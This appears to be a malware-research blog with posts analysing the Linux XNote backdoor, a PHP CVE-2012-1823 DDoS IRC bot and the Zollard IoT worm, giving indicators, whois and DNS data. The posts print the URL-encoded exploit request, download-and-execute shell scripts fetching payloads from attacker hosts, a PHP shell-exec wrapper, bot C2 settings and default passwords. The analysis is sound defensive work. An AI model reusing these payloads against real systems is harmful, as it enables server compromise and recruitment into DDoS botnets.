Monday, February 9, 2015

Linux.BackDoor.XNote.1 indicators

We continue to see a variety of Linux ELF malware, particularly those focused on DDoS.
Over the past few years, the good folks at Malware Must Die have done an extensive study of ELF malware variants at their blog: http://blog.malwaremustdie.org/

Today, DrWeb wrote about a multipurpose Linux ELF called 'xnote', that opens a backdoor on the compromised host.  The host is then used for a variety of functions, including as a DDoS bot.
The DrWeb posts provide a very good analysis of the malware and its overall structure.
http://news.drweb.com/show/?i=9272&lng=en&c=5
http://vms.drweb.com/virus/?i=4323517

We decided to take a closer look at this sample in order to provide a few indicators that may be of interest.
The xnote sample we studied has MD5 hash f374d1561e553a4c5b803e1d9d15a34e.

Upon execution, we noted the sample contact a DNS server on 114.114.114.114 with queries for the following domains:

  • a.et2046.com
  • b.et2046.com
  • c.et2046.com
For each query, IP address 122.10.85.54 was returned for each of them.

In our run, the malicious 'xnote' process was noted to have process ID of 1303. Using 'volatility' to map information about the process memory, we noted:
Volatility Foundation Volatility Framework 2.4
Pid  Start      End        Flags Pgoff    Major Minor Inode  Path              
1303   0xc01000   0xc02000 r-x        0x0     8     1 405848 /home/mattyh/xnote
1303  0x8048000  0x81ba000 r-x        0x0     0     0      0                   
1303  0x81ba000  0x81c4000 rwx        0x0     0     0      0                   
1303  0xa137000  0xa158000 rwx        0x0     0     0      0 [heap]            
1303 0xb78b6000 0xb78b7000 r-x        0x0     0     0      0 [vdso]            
1303 0xbf843000 0xbf859000 rwx        0x0     0     0      0 [stack]

Dumping the associated data from each segment, we were able to recover a few artifacts from the process, including the domains queried.

XXXXXXXXXXXXXXXX122.10.85.54
a.et2046.com
b.et2046.com
c.et2046.com
e.et2046.com
test
CAk[S
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
.,-+xX0123456789abcdef0123456789ABCDEF-+xX0123456789abcdefABCDEF
-0123456789

-0123456789


Domain and IP Information:

It is interesting to note that the domain "et2046.com" has been seen before in other Linux ELF malware.
  • Note this post to an Ubuntu forum from May, 2014 where the subdomains 'kill.et2046.com' and 'sb.et2046.com' were noted in a running process on a compromised Ubuntu host.
  • Malware Must Die posted an analysis of the Linux iptablex malware where these domains were also seen:
  • Via VirusTotal searches, we find related malware to these domains:


Obtaining Passive DNS information from FarSight Security's DNSDB, we see that currently for IP address 122.10.85.54 the only DNS records are:

www.qtol.tv. A 122.10.85.54

Additional information from DNSDB for the domain et2046.com:

count 54
first seen in zone file 2014-11-12 17:13:42 -0000
last seen in zone file 2015-01-13 17:23:33 -0000
et2046.com. NS a.dnspod.com.
et2046.com. NS b.dnspod.com.
et2046.com. NS c.dnspod.com.


count 329
first seen in zone file 2013-12-17 17:13:33 -0000
last seen in zone file 2014-11-11 17:12:29 -0000
et2046.com. NS ns155.dnsever.com.
et2046.com. NS ns165.dnsever.com.
et2046.com. NS ns179.dnsever.com

Note that the malware uses a hardcoded DNS server on 114.114.114.114 to provide all domain resolution.   This is a public DNS server based in China, with its web page at www.114dns.com



whois - 114.114.114.114

inetnum:        114.114.0.0 - 114.114.255.255
netname:        XFInfo
descr:          NanJing XinFeng Information Technologies, Inc.
descr:          Room 207, Building 53, XiongMao Group, No.168 LongPanZhong Road
descr:          Xuanwu District, Nanjing, Jiangsu, China
country:        CN
irt:            IRT-CNNIC-CN
address:        Beijing, China
e-mail:         ipas@cnnic.cn
abuse-mailbox:  ipas@cnnic.cn

person:         Yan Jian
nic-hdl:        YJ1777-AP
e-mail:         jyan@greatbit.com

person:         Zhao Zhenping
nic-hdl:        ZZ2094-AP
e-mail:         ping@greatbit.com

whois- 122.10.85.54

inetnum:        122.10.80.0 - 122.10.95.255
netname:        TOINTER-CN
descr:          Royal Network Technology Co., Ltd. in Guangzhou
country:        HK
admin-c:        WX2631-AP
tech-c:         WX2631-AP
status:         ASSIGNED NON-PORTABLE
mnt-by:         MAINT-CN-TOINTER122
mnt-irt:        IRT-TOINTER-CN
changed:        tengdayx@gmail.com 20150112
source:         APNIC

irt:            IRT-TOINTER-CN
address:        Liwan District of Guangzhou, Guangdong Fangcun West 533, guangzhou guangdong 510360
e-mail:         abuse@gzroyal.cn
abuse-mailbox:  abuse@gzroyal.cn
admin-c:        RNTC1-AP
tech-c:         RNTC1-AP
auth:           # Filtered
mnt-by:         MAINT-TOINTER-CN
changed:        hm-changed@apnic.net 20140919
source:         APNIC

person:         Wei XeiJun
address:        Liwan District of Guangzhou, Guangdong Fangcun West 533
country:        CN
phone:          +86.1234567890
e-mail:         tengdayx@qq.com
nic-hdl:        WX2631-AP
mnt-by:         MAINT-TOINTER-CN
changed:        tengdayx@qq.com 20150111


'whois' for Domain et2046.com

Domain Name: ET2046.COM
Registry Domain ID: 1762221508_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.godaddy.com
Registrar URL: http://www.godaddy.com
Update Date: 2014-08-25T06:58:17Z
Creation Date: 2012-11-27T14:02:55Z
Registrar Registration Expiration Date: 2016-11-27T14:02:55Z
Registrar: GoDaddy.com, LLC
Registrar IANA ID: 146
Registrar Abuse Contact Email: abuse@godaddy.com
Registrar Abuse Contact Phone: +1.480-624-2505

Registry Registrant ID: 
Registrant Name: smaina smaina
Registrant Organization: 
Registrant Street: Beijing
Registrant City: Beijing
Registrant State/Province: Beijing
Registrant Postal Code: 100080
Registrant Country: China
Registrant Phone: +86.18622222222
Registrant Phone Ext: 
Registrant Fax: 
Registrant Fax Ext: 
Registrant Email: tuhao550@gmail.com


-----------------------------------------------------------------------------------------------------------------------
(Uses same password scheme as Contagio.  Ping me or Mila for details if needed)

Thursday, February 5, 2015

Library of Malware Traffic Patterns


Update February 2015 
Use the new link below for a new interface and updates.

Traffic analysis has been the primary method of malware identification and thousands of IDS signatures developed are the daily proof. Signatures definitely help but ability to visually recognize  malware traffic patterns has been always an important skill for anyone tasked with network defense. The number of malware analysis blogs and papers is overwhelming and it is difficult to keep track of malware features if you don't have access to a well designed and constantly updated malware database. This started as "personal notes" spreadsheet with GET and POST requests for different malware families with information from open sources. We decided others might find it useful too.

Click on the column headers to see recent entries. Use other column headers to sort as needed. Wait a few seconds for the table to load from the Google Sheet. URI and User-Agent fields might have spaces for easier cell wrapping. Remove them if you export the data.
Yes, you can download samples mentioned in the spreadsheet. See the "dl" column in the full spreadsheet table and corresponding links to the download location. Use "Contagio" password scheme (email Mila or admin at deependresearch.org)
Image credit: Jay Walker Library. Src.Vancouversun

VIEW OR DOWNLOAD "MALWARE TRAFFIC PATTERNS"

 List of malware families and available downloads for their samples, pcaps (click on the link above for the full post)


Tuesday, July 8, 2014

Another Linux DDoS bot via CVE-2012-1823

If you run a web server, you should be very familiar with the PHP vulnerability classified as CVE-2012-1823.  Successful exploitation of this vulnerability allows a remote attacker to inject arbitrary code via command line options within the HTTP query string.  Unfortunately, there remain a large number of PHP servers that do not have this vulnerability patched, making them an ideal vehicle for acting as a DDoS bot.  

Our friends at MalwareMustDie have recently put up several excellent posts discussing Linux malware, particularly dealing with DDoS.  While they have covered a wide spectrum of Linux malware in the wild, it seems that new variants and bot infrastructures are continually being spun up.  We like to study and track these variants and infrastructures, as well as the payloads that are being injected.  In this case, one particular payload caught our eye.

In this case, the exploit attempt had URL encoding of:

POST //cgi-bin/php?%2d%64+%61%6c%6c%6f%77%5f%75%72%6c%5f%69%6e%63%6c%75%64%65%3d%6f%6e+%2d%64+%73%61%66%65%5f%6d%6f%64%65%3d%6f%66%66+%2d%64+%73%75%68%6f%73%69%6e%2e%73%69%6d%75%6c%61%74%69%6f%6e%3d%6f%6e+%2d%64+%64%69%73%61%62%6c%65%5f%66%75%6e%63%74%69%6f%6e%73%3d%22%22+%2d%64+%6f%70%65%6e%5f%62%61%73%65%64%69%72%3d%6e%6f%6e%65+%2d%64+%61%75%74%6f%5f%70%72%65%70%65%6e%64%5f%66%69%6c%65%3d%70%68%70%3a%2f%2f%69%6e%70%75%74+%2d%64+%63%67%69%2e%66%6f%72%63%65%5f%72%65%64%69%72%65%63%74%3d%30+%2d%64+%63%67%69%2e%72%65%64%69%72%65%63%74%5f%73%74%61%74%75%73%5f%65%6e%76%3d%30+%2d%64+%61%75%74%6f%5f%70%72%65%70%65%6e%64%5f%66%69%6c%65%3d%70%68%70%3a%2f%2f%69%6e%70%75%74+%2d%6e HTTP/1.1
Content-Length: 188
Content-Type: application/x-www-form-urlencoded
Host: -h

When decoded, the actual URL is :

Decoded CVE-2012-1823 exploit attempt

Upon successful compromise, the attacker injects the following:

<? system("cd /tmp ; wget <redacted>.us.to/seed.jpg ; curl -O http://<redacted>.us.to/seed.jpg ; fetch http://<redacted>.us.to/seed.jpg ; tar -xzvf seed.jpg ; chmod +x seed ; ./seed ; rm -rf * "); ?>

seed.jpg" is actually a tar file, which when expanded reveals a bash script named "seed"

#!/bin/bash
cd /var/tmp/ ;wget <redacted>.us.to/index.htm; curl -O http://<redacted>.us.to/index.htm; fetch http://<redacted>.us.to/index.htm; tar -xzvf index.htm;rm -rf index.htm; perl /var/tmp/libssl3.so.2 ; rm -rf *; wget <redacted>.us.to/stats.php;fetch http://<redacted>.us.to/stats.php ;curl -O http://<redacted>.us.to/stats.php; tar -xzvf stats.php ; rm -rf stats.php ; cd .d ;./autorun

This script instructs the compromised server to fetch 'index.htm' from http://<redacted>.us.to. This again is a tar file, which when expanded, gives a file named "libssl3.so.2".  This file is actually a perl script called "DDoS Perl IrcBot v1.0 / 2012 by DDoS Security Team".  A copy of this popular IRCBot can be found at this PasteBin link.

Some of the configuration variables for the version of IrcBot dropped on our honeypots include:
$server = 'antiq.scifi.ro'
$server = 'antiq.evils.in'
my @admins = ("AnTiQ","deathy","Vasy");
my @hostauth = ("Qiss.users.undernet.org","Amadeo.users.undernet.org");
my @channels = ("#vnc");

The "seed' script also instructed our server to download "stats.php".  This was also a tar file, which when expanded, created a hidden directory named ".d" which contained the following files:

Contents of hidden 'd' subdirectory
The subdirectory "c" contained source files for port flooding routines.

Contents of 'c' subdirectory


Section of "Slashing SirVic's"flooding source code.

Two other files included in the "stats.php" tarball were of particular interest.  They are named "bang.txt" and "shiet.txt", and contain long lists of IP addresses and ports.  At this point, it's not clear what these lists represent, however "bang.txt" appears to contain many non-U.S addresses, notably weighted toward Romania.  "shiet.txt" contains a wide variety of IP addresses, representing many kinds of organizations, corporations, universities, and service providers.
After observing several DDoS attacks initiated by this infrastructure, we didn't note a correlation between these lists, and any attack victims.  We also did not yet observe any correlation between these lists and compromised hosts initiating DDoS attack traffic.

The contents of "bang.txt", broken out by ASN and Network name can be viewed from here: Link to "bang.txt"

The contents of "shiet.txt", broken out by ASN and Network name can be viewed from here:  Link to "shiet.txt"

Soon after the script downloads, our server joined the IRC on antiq.scifi.ro (195.182.159.51)

Bot joining C2 on antiq.scifi.ro
Not long after that, a command initiating a flood attack against 70.39.96.225 begins, and the compromised host begins sending fragmented UDP packets to the victim.


Bot being instructed to begin UDP flood to victim

Packet capture of UDP flood
We've observed this botnet as being very active, targeting a wide variety of victims.   While IRC botnets have been around for many years, the seeding and attack mechanisms continue to evolve.

Unpatched CMS, weak SSH passwords, as well as vulnerable PHP deployments remain a major weakspot in Internet facing servers.  It's pretty safe to say that if web site administrators do not perform a regular, stringent patch management program, it's just a matter of 'when', not 'if' they will be compromised.



Tuesday, December 3, 2013

Hey Zollard, leave my Internet of Things alone!

We've long been tracking exploit attempts against web servers, notably CMS hosts, ColdFusion, and vanilla PHP/CGI servers. Of late, we've observed a fairly large increase in PHP exploit attempts.  So Symantec's recent report about Linux.Darlloz targeting "The Internet of Things" was of particular interest.

Recently I noted an inbound PHP exploit attempt from 78.39.232.113 - Telecommunication Company of Kordestan - Iran

PHP exploit attempt from 78.39.232.113
The decoded POST is:

-d allow_url_include=%6Fn -d safe_mode=off -d suhosin%2Esimulation=on -d disable_fu%6Ections="" -d open_basedir=none -d auto_prepend_file=php:%2F/input -d cgi.force_redirec%74=0 -d cgi.redirect_status_env=0 -n

Note the User-Agent: Zollard and the reference to the files that will attempt to be to be executed upon successful compromise. The files indicate several architectures, arm, ppc, mips, mipsel, and x86.

All files were fetched, and the x86 file was sandboxed on a linux VM.  Immediately the VM began incrementally scanning 117.201.0.0/18 for open destination port 58455.  The linux malware also opened up a listener on my VM's port 58455.

Compromised host listening on port 58455

Upon finding a remote host listening on that port, the local host would initially send 0x00020015 and would receive one of several replies including, 0x010005, 0x01010006, or 0x01020006

Depending on the reply, the scanning host would then attempt a Telnet connection to the remote host that it had previously connected to on port 58445.  Examining strings of the malware files show several usernames that are attempted, including "root" and "admin"
Weak or non-existent passwords allow for a successful telnet login, with examples below:


Example of Telnet session to a BusyBox device

Example of Telnet session to ARM architecture device

As mentioned earlier, the malware files for the x86, arm, mips, mipsel, and ppc architectures were fetched.  You may find it of interest to see a strings dump of each of the files:


#EgvT2
@ #!
!1C "
V! 0
/proc/self/exe
nodes
POST
Host:
User-Agent: Zollard
Content-Type: application/x-www-form-urlencoded
Content-Length:
Connection: close
$disablefunc = @ini_get("disable_functions");
if (!empty($disablefunc))
$disablefunc = str_replace(" ","",$disablefunc);
$disablefunc = explode(",",$disablefunc);
function myshellexec($cmd)
global $disablefunc;
$result = "";
if (!empty($cmd))
if (is_callable("exec") and !in_array("exec",$disablefunc)) {exec($cmd,$result); $result = join("\n",$result);}
elseif (($result = `$cmd`) !== FALSE) {}
elseif (is_callable("system") and !in_array("system",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
elseif (is_callable("passthru") and !in_array("passthru",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
elseif (is_resource($fp = popen($cmd,"r")))
$result = "";
while(!feof($fp)) {$result .= fread($fp,1024);}
pclose($fp);
return $result;
myshellexec("wget -O /tmp/x86 http://www.gpharma.co/x86");
myshellexec("chmod +x /tmp/x86");
myshellexec("/tmp/x86");
HTTP/1.1 200 OK
httpd
/bin/sh
/proc
/proc/
/stat
insmod /lib/modules/`uname -r`/kernel/net/ipv4/netfilter/ip_tables.ko
insmod /lib/modules/`uname -r`/kernel/net/ipv4/netfilter/iptable_filter.ko
iptables -D INPUT -p tcp --dport 23 -j DROP
iptables -A INPUT -p tcp --dport 23 -j DROP
telnetd
/var/run/.lightpid
/var/run/.aidrapid
/var/run/lightpid
/var/run/.lightscan
/var/run/lightscan
/var/run/mipsel
/var/run/mips
/var/run/sh
/var/run/arm
/var/run/ppc
/var/run/m
/var/run/mi
/var/run/s
/var/run/a
/var/run/p
/var/run/msx
/var/run/mx
/var/run/sx
/var/run/ax
/var/run/px
/var/run/32
/var/run/sel
/var/run/pid
/var/run/gcc
/var/run/dev
/var/run/psx
/var/run/mpl
/var/run/mps
/var/run/sph
/var/run/arml
/var/run/mips.l
/var/run/mipsell
/var/run/ppcl
/var/run/shl
/bin/pp
/bin/mi
/bin/mii
/var/tmp/dreams.install.sh
/var/tmp/ep2.ppc
/var/0.run
/var/1.run
/var/idhash
/var/response
/var/challenge
/var/b.arm_v5t
/var/b.arm_v6k
/var/f.arm_v5t
/var/f-t2.arm_v6k
/var/f-t2.mips
/var/f-t2.mipsel
/var/sp.arm_v5t
/var/sp.arm_v6k
/var/t2.arm_v6k
/var/readme
/var/b/b3.arm_v5t
/var/b/b3.arm_v6k
/var/b/b3.mips
/var/b/b3.ramips
/var/b/b3.rtl
/var/b/readme
/var/b/0.run
/var/b/1.run
/var/b/idhash
/dav/0.run
/dav/1.run
/dav/b3.arm_v5t
/dav/b3.arm_v6k
/dav/b3.mips
/dav/b3.rtl
/dav/idhash
/dav/readme
/var/b
/usr/bin/wget
/usr/bin/-wget
/var/run/z
reboot
#!/bin/sh
ls /bin/killall || ls /sbin/killall || ls /usr/bin/killall || ls /usr/sbin/killall || reboot
killall arm ppc mips mipsel
sleep 10
/var/run/.zollard/arm || /var/run/.zollard/ppc || /var/run/.zollard/mips || /var/run/.zollard/mipsel || reboot
GET / HTTP/1.1
Host:
mipsel
/cgi-bin/php
/cgi-bin/php5
/cgi-bin/php-cgi
/cgi-bin/php.cgi
/cgi-bin/php4
EHW:
p"XW
m >
echo -n >
&& echo -e \\x5A
mkdir -p
/var/run/.zollard/
chmod +x
cp /bin/sh
admin
root
0!0
SHA1
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
.shstrtab
.text
.rodata
.data
.bss
.comment

/proc/self/exe
nodes
POST
Host:
User-Agent: Zollard
Content-Type: application/x-www-form-urlencoded
Content-Length:
Connection: close
$disablefunc = @ini_get("disable_functions");
if (!empty($disablefunc))
$disablefunc = str_replace(" ","",$disablefunc);
$disablefunc = explode(",",$disablefunc);
function myshellexec($cmd)
global $disablefunc;
$result = "";
if (!empty($cmd))
if (is_callable("exec") and !in_array("exec",$disablefunc)) {exec($cmd,$result); $result = join("\n",$result);}
elseif (($result = `$cmd`) !== FALSE) {}
elseif (is_callable("system") and !in_array("system",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
elseif (is_callable("passthru") and !in_array("passthru",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
elseif (is_resource($fp = popen($cmd,"r")))
$result = "";
while(!feof($fp)) {$result .= fread($fp,1024);}
pclose($fp);
return $result;
myshellexec("wget -O /tmp/x86 http://www.gpharma.co/x86");
myshellexec("chmod +x /tmp/x86");
myshellexec("/tmp/x86");
HTTP/1.1 200 OK
httpd
/bin/sh
/proc
/proc/
/stat
insmod /lib/modules/`uname -r`/kernel/net/ipv4/netfilter/ip_tables.ko
insmod /lib/modules/`uname -r`/kernel/net/ipv4/netfilter/iptable_filter.ko
iptables -D INPUT -p tcp --dport 23 -j DROP
iptables -A INPUT -p tcp --dport 23 -j DROP
telnetd
/var/run/.lightpid
/var/run/.aidrapid
/var/run/lightpid
/var/run/.lightscan
/var/run/lightscan
/var/run/mipsel
/var/run/mips
/var/run/sh
/var/run/arm
/var/run/ppc
/var/run/m
/var/run/mi
/var/run/s
/var/run/a
/var/run/p
/var/run/msx
/var/run/mx
/var/run/sx
/var/run/ax
/var/run/px
/var/run/32
/var/run/sel
/var/run/pid
/var/run/gcc
/var/run/dev
/var/run/psx
/var/run/mpl
/var/run/mps
/var/run/sph
/var/run/arml
/var/run/mips.l
/var/run/mipsell
/var/run/ppcl
/var/run/shl
/bin/pp
/bin/mi
/bin/mii
/var/tmp/dreams.install.sh
/var/tmp/ep2.ppc
/var/tmp/ep2.mips
/usr/bin/wget
/usr/bin/-wget
/var/run/z
reboot
#!/bin/sh
ls /bin/killall || ls /sbin/killall || ls /usr/bin/killall || ls /usr/sbin/killall || reboot
killall arm ppc mips mipsel
sleep 10
/var/run/.zollard/arm || /var/run/.zollard/ppc || /var/run/.zollard/mips || /var/run/.zollard/mipsel || reboot
GET / HTTP/1.1
Host:
mips
mipsel
/cgi-bin/php
/cgi-bin/php5
/cgi-bin/php-cgi
/cgi-bin/php.cgi
/cgi-bin/php4
EHW:
p"XW
m >
echo -n >
&& echo -e \\x5A
mkdir -p
/var/run/.zollard/
chmod +x
cp /bin/sh
admin
root
0!0
SHA1
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
.shstrtab
.reginfo
.text
.rodata
.data.rel.ro
.data
.got
.sbss
.bss
.comment
.mdebug.abi32
.pdr
Strings from 'arm' file
Strings from 'mips' file

/proc/self/exe
nodes
POST
Host:
User-Agent: Zollard
Content-Type: application/x-www-form-urlencoded
Content-Length:
Connection: close
$disablefunc = @ini_get("disable_functions");
if (!empty($disablefunc))
$disablefunc = str_replace(" ","",$disablefunc);
$disablefunc = explode(",",$disablefunc);
function myshellexec($cmd)
global $disablefunc;
$result = "";
if (!empty($cmd))
if (is_callable("exec") and !in_array("exec",$disablefunc)) {exec($cmd,$result); $result = join("\n",$result);}
elseif (($result = `$cmd`) !== FALSE) {}
elseif (is_callable("system") and !in_array("system",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
elseif (is_callable("passthru") and !in_array("passthru",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
elseif (is_resource($fp = popen($cmd,"r")))
$result = "";
while(!feof($fp)) {$result .= fread($fp,1024);}
pclose($fp);
return $result;
myshellexec("wget -O /tmp/x86 http://www.gpharma.co/x86");
myshellexec("chmod +x /tmp/x86");
myshellexec("/tmp/x86");
HTTP/1.1 200 OK
httpd
/bin/sh
/proc
/proc/
/stat
insmod /lib/modules/`uname -r`/kernel/net/ipv4/netfilter/ip_tables.ko
insmod /lib/modules/`uname -r`/kernel/net/ipv4/netfilter/iptable_filter.ko
iptables -D INPUT -p tcp --dport 23 -j DROP
iptables -A INPUT -p tcp --dport 23 -j DROP
telnetd
/var/run/.lightpid
/var/run/.aidrapid
/var/run/lightpid
/var/run/.lightscan
/var/run/lightscan
/var/run/mipsel
/var/run/mips
/var/run/sh
/var/run/arm
/var/run/ppc
/var/run/m
/var/run/mi
/var/run/s
/var/run/a
/var/run/p
/var/run/msx
/var/run/mx
/var/run/sx
/var/run/ax
/var/run/px
/var/run/32
/var/run/sel
/var/run/pid
/var/run/gcc
/var/run/dev
/var/run/psx
/var/run/mpl
/var/run/mps
/var/run/sph
/var/run/arml
/var/run/mips.l
/var/run/mipsell
/var/run/ppcl
/var/run/shl
/bin/pp
/bin/mi
/bin/mii
ep2.mips
/var/tmp/dreams.install.sh
/var/tmp/ep2.ppc
/var/tmp/ep2.mips
/usr/bin/wget
/usr/bin/-wget
/var/run/z
reboot
#!/bin/sh
ls /bin/killall || ls /sbin/killall || ls /usr/bin/killall || ls /usr/sbin/killall || reboot
killall arm ppc mips mipsel
sleep 10
/var/run/.zollard/arm || /var/run/.zollard/ppc || /var/run/.zollard/mips || /var/run/.zollard/mipsel || reboot
GET / HTTP/1.1
Host:
mipsel
/cgi-bin/php
/cgi-bin/php5
/cgi-bin/php-cgi
/cgi-bin/php.cgi
/cgi-bin/php4
EHW:
p"XW
m
GYvh
QdV[3
y8G9
lQ\a< >
echo -n >
&& echo -e \\x5A
mkdir -p
/var/run/.zollard/
chmod +x
cp /bin/sh
admin
root
0!0
SHA1
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
.shstrtab
.reginfo
.text
.rodata
.data.rel.ro
.data
.got
.sbss
.bss
.comment
.mdebug.abi32
.pdr
/proc/self/exe
nodes
POST
Host:
User-Agent: Zollard
Content-Type: application/x-www-form-urlencoded
Content-Length:
Connection: close
$disablefunc = @ini_get("disable_functions");
if (!empty($disablefunc))
$disablefunc = str_replace(" ","",$disablefunc);
$disablefunc = explode(",",$disablefunc);
function myshellexec($cmd)
global $disablefunc;
$result = "";
if (!empty($cmd))
if (is_callable("exec") and !in_array("exec",$disablefunc)) {exec($cmd,$result); $result = join("\n",$result);}
elseif (($result = `$cmd`) !== FALSE) {}
elseif (is_callable("system") and !in_array("system",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
elseif (is_callable("passthru") and !in_array("passthru",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
elseif (is_resource($fp = popen($cmd,"r")))
$result = "";
while(!feof($fp)) {$result .= fread($fp,1024);}
pclose($fp);
return $result;
myshellexec("wget -O /tmp/x86 http://www.gpharma.co/x86");
myshellexec("chmod +x /tmp/x86");
myshellexec("/tmp/x86");
HTTP/1.1 200 OK
httpd
/bin/sh
/proc
/proc/
/stat
insmod /lib/modules/`uname -r`/kernel/net/ipv4/netfilter/ip_tables.ko
insmod /lib/modules/`uname -r`/kernel/net/ipv4/netfilter/iptable_filter.ko
iptables -D INPUT -p tcp --dport 23 -j DROP
iptables -A INPUT -p tcp --dport 23 -j DROP
telnetd
/var/run/.lightpid
/var/run/.aidrapid
/var/run/lightpid
/var/run/.lightscan
/var/run/lightscan
/var/run/mipsel
/var/run/mips
/var/run/sh
/var/run/arm
/var/run/ppc
/var/run/m
/var/run/mi
/var/run/s
/var/run/a
/var/run/p
/var/run/msx
/var/run/mx
/var/run/sx
/var/run/ax
/var/run/px
/var/run/32
/var/run/sel
/var/run/pid
/var/run/gcc
/var/run/dev
/var/run/psx
/var/run/mpl
/var/run/mps
/var/run/sph
/var/run/arml
/var/run/mips.l
/var/run/mipsell
/var/run/ppcl
/var/run/shl
/bin/pp
/bin/mi
/bin/mii
ep2.ppc
/var/tmp/dreams.install.sh
/var/tmp/ep2.ppc
/usr/bin/wget
/usr/bin/-wget
/var/run/z
reboot
#!/bin/sh
ls /bin/killall || ls /sbin/killall || ls /usr/bin/killall || ls /usr/sbin/killall || reboot
killall arm ppc mips mipsel
sleep 10
/var/run/.zollard/arm || /var/run/.zollard/ppc || /var/run/.zollard/mips || /var/run/.zollard/mipsel || reboot
GET / HTTP/1.1
Host:
mips
mipsel
/cgi-bin/php
/cgi-bin/php5
/cgi-bin/php-cgi
/cgi-bin/php.cgi
/cgi-bin/php4
EHW:
p"XW
m
GYvh
QdV[3
y8G9
lQ\a< >
echo -n >
&& echo -e \\x5A
mkdir -p
/var/run/.zollard/
chmod +x
cp /bin/sh
admin
root
0!0
SHA1
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
.shstrtab
.text
.rodata
.data
.sbss
.bss
.comment
Strings from 'mipsel' file
Strings from 'ppc' file
Host:
User-Agent: Zollard
Content-Type: application/x-www-form-urlencoded
Content-Length:
Connection: close
$disablefunc = @ini_get("disable_functions");
if (!empty($disablefunc))
$disablefunc = str_replace(" ","",$disablefunc);
$disablefunc = explode(",",$disablefunc);
function myshellexec($cmd)
global $disablefunc;
$result = "";
if (!empty($cmd))
if (is_callable("exec") and !in_array("exec",$disablefunc)) {exec($cmd,$result); $result = join("\n",$result);}
elseif (($result = `$cmd`) !== FALSE) {}
elseif (is_callable("system") and !in_array("system",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
elseif (is_callable("passthru") and !in_array("passthru",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
elseif (is_resource($fp = popen($cmd,"r")))
$result = "";
while(!feof($fp)) {$result .= fread($fp,1024);}
pclose($fp);
return $result;
myshellexec("wget -O /tmp/x86 http://www.gpharma.co/x86");
myshellexec("chmod +x /tmp/x86");
myshellexec("/tmp/x86");
HTTP/1.1 200 OK
httpd
nodes
/bin/sh
GET / HTTP/1.1
Host:
/proc
/proc/
/stat
insmod /lib/modules/`uname -r`/kernel/net/ipv4/netfilter/ip_tables.ko
insmod /lib/modules/`uname -r`/kernel/net/ipv4/netfilter/iptable_filter.ko
iptables -D INPUT -p tcp --dport 23 -j DROP
iptables -A INPUT -p tcp --dport 23 -j DROP
telnetd
/var/run/.lightpid
/var/run/.aidrapid
/var/run/lightpid
/var/run/.lightscan
/var/run/lightscan
/var/run/mipsel
/var/run/mips
/var/run/sh
/var/run/arm
/var/run/ppc
/var/run/m
/var/run/mi
/var/run/s
/var/run/a
/var/run/p
/var/run/msx
/var/run/mx
/var/run/sx
/var/run/ax
/var/run/px
/var/run/32
/var/run/sel
/var/run/pid
/var/run/gcc
/var/run/dev
/var/run/psx
/var/run/mpl
/var/run/mps
/var/run/sph
/var/run/arml
/var/run/mips.l
/var/run/mipsell
/var/run/ppcl
/var/run/shl
/bin/pp
/bin/mi
/bin/mii
/var/tmp/dreams.install.sh
/var/tmp/ep2.ppc
/usr/bin/wget
/usr/bin/-wget
/cgi-bin/php
/cgi-bin/php5
/cgi-bin/php-cgi
/cgi-bin/php.cgi
/cgi-bin/php4
EHW:
p"XW
m >
echo -n >
&& echo -e \\x5A
mkdir -p
/var/run/.zollard/
chmod +x
cp /bin/sh
root
1234
12345
dreambox
smcadmin
0!0
SHA1
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
.shstrtab
.text
.rodata
.data
.bss
.comment
Strings from 'x86' file

So who is "Zollard"?  What is the relationship between the scanned targets and the original scanner?
There is a good deal more research to be done on this malware, as well as the hosting infrastructure supporting these exploit attempts.  At this point, we believe that the malware hosting location is a compromised host, and is not part of this campaign.

We recommend the blocking of IP address 78.39.232.113 and ensuring that all Internet facing devices, yes "devices" are strongly secured. 

Friday, May 31, 2013

